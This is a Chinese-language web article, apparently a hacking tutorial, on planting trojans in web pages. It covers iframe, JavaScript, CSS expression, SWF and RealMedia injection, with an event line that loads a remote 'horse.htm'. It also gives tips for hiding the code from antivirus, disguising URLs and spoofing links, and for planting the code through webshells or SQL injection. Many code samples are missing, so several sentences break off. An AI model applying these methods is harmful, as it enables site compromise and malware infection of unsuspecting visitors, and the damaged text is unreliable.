常見(jiàn)網(wǎng)頁(yè)掛馬有什么方法

常見(jiàn)網(wǎng)頁(yè)掛馬有什么方法

　　掛馬的N種方法

　　(1) HTML掛馬法。

　　常規(guī)的HTML掛馬方法一般是在網(wǎng)頁(yè)中插入一條iframe語(yǔ)句，像。查看站點(diǎn)是否被掛，一般是查找一下關(guān)鍵詞iframe。

　　(2) 再隱藏一點(diǎn)的就是js掛馬了。

　　像再原來(lái)的網(wǎng)頁(yè)中寫(xiě)入 ，horse里的js寫(xiě)法一般為 document.write(’http:\/\/www.kuqin.com\/horse.html’>;，或者專(zhuān)業(yè)一點(diǎn)的寫(xiě)法是 top.document.body.innerHTML = top.document.body.innerHTML + ‘\r\n”;。不過(guò)第2種寫(xiě)法要注意：是原 來(lái)的網(wǎng)頁(yè)種要有body標(biāo)簽。

　　3) 在 css中掛馬。

　　這個(gè)方法就是在css中寫(xiě)入

　　然后在主頁(yè)中調(diào)用這個(gè)CSS，代碼類(lèi)似http://www.kuqin.com/css.css” rel=”stylesheet” type=”text/css”>這樣的。在csdn 中對(duì)expression的解釋是：IE5及其以后版本支持在CSS中使用expression，用來(lái)吧CSS屬性和javascript表達(dá)式關(guān)聯(lián)起 來(lái)，這里的CSS屬性可以是元素固有的屬性，也可以是自定義屬性。也就是說(shuō)CSS屬性后面可以是一段Javasccript表達(dá)式，CSS屬性的值等于 javascript表達(dá)式計(jì)算的結(jié)果。在表達(dá)式中可以是直接一用元素自身的屬性和方法，也可以使用其它瀏覽器對(duì)象。這個(gè)表達(dá)式就好像是在這個(gè)元素的一個(gè) 成員函數(shù)中一樣。整個(gè)解釋關(guān)鍵點(diǎn)是expression可以在css中引入js語(yǔ)句，所以我們可用于掛馬。不過(guò)寫(xiě)的語(yǔ)句值可以遠(yuǎn)程調(diào)用，本地不可以。

　　(4) 在swf中掛馬

　　網(wǎng)上有一些swf掛馬的工具，可以用工具替換原來(lái)網(wǎng)頁(yè)中的swf或單獨(dú)把swf發(fā)給對(duì)方，一可以單獨(dú)作一個(gè)可顯示swf頁(yè)的網(wǎng)頁(yè)。在網(wǎng)頁(yè)中插入swf的語(yǔ)法一般格式為：

　　(5) 在影音文件中掛馬。

　　所需工具是RealMedia Editor，打開(kāi)工具后，然后依次選擇”文件”-”打開(kāi)Real媒體文件”，然后選擇需要編輯的視頻文件，其格式必須是RealOne公司的以RM或 RMVB為擴(kuò)展名的文件。接著，新建一個(gè)文本，在里面輸入u 00:00:10:0 00:00:30.0&&_rpexternal& http://www.kuqin.com/horse.htm (00:00:10.0就是發(fā)生第一事件的時(shí)間，這里是讓計(jì)算機(jī)彈出網(wǎng)頁(yè);00:00:30.0同樣，這是第二次發(fā)生的時(shí)間，在0時(shí)0分第30秒0微妙時(shí) 彈出窗口;而后面的URL地址就是連接指定的木馬地址。)

　　輸入完畢后并保存，然后依次選擇”工具”-”合并事件”，導(dǎo)入剛才的文本。當(dāng)合并完成后，依次選擇”文本”-”Real文件另存為”，保存好即可。

　　最后把生成的視頻文件發(fā)布網(wǎng)上，當(dāng)對(duì)方觀(guān)看同時(shí)就會(huì)連接到你指定的木馬地址

　　2、掛馬的技巧

　　掛馬首先要求的是隱蔽性，這樣掛的時(shí)間才能長(zhǎng)。像在SWF、JS、RM中掛馬就是比較隱蔽了，但是還可再用到些技巧。

　　(1)遠(yuǎn)程任意后綴執(zhí)行HTML

　　2)JS的加密

　　為了保護(hù)網(wǎng)頁(yè)木馬的代碼，可以把JS內(nèi)容加密，還能躲開(kāi)殺軟的作用。如果使用ENCODE加密方式，加密后的JS調(diào)用語(yǔ)句就 用。除此方法外，還有其它更多的方法!

　　(3)URL的變形

　　URL的變形方法也有很多，例如將url的16進(jìn)制轉(zhuǎn)換為encod編碼等。如果是涉及到URL欺騙的方法就更多了，不過(guò)多數(shù)的URL欺騙，像利用@的技巧，IE都已經(jīng)打補(bǔ)丁了。但現(xiàn)在有個(gè)漏洞仍然有效。代碼如下：

　　保存該代碼為網(wǎng)頁(yè)后，鼠標(biāo)移動(dòng)到Google這個(gè)鏈接上時(shí)，IE狀態(tài)欄顯示的http://www.google.cn，但點(diǎn)擊鏈接后卻打開(kāi) http://www.kuqin.com網(wǎng)站。如果你的網(wǎng)馬可以用IP地址訪(fǎng)問(wèn)到的話(huà)，IP地址也可以進(jìn)行轉(zhuǎn)換的。像127.0.0.1這樣的IP還可以 變?yōu)?2130706433、0×7f.0×00.0×00.0×01、0177.0000.0000.0001等等，這只不過(guò)是8進(jìn)制、10進(jìn)制、16進(jìn)制、 的轉(zhuǎn)換而已。

　　3、如何才能掛到馬

　　拿到了webshell的話(huà)，掛馬自然是很簡(jiǎn)單了。但是拿不到的情況下，如果注入點(diǎn)有update權(quán)限，我們可以仔細(xì)查找首頁(yè)中的某條新聞的調(diào)用鏈 接，然后update數(shù)據(jù)庫(kù)達(dá)到我們的目的。如果可進(jìn)入后臺(tái)，我沒(méi)就可以在一些發(fā)公告的地方寫(xiě)入自己的木馬代碼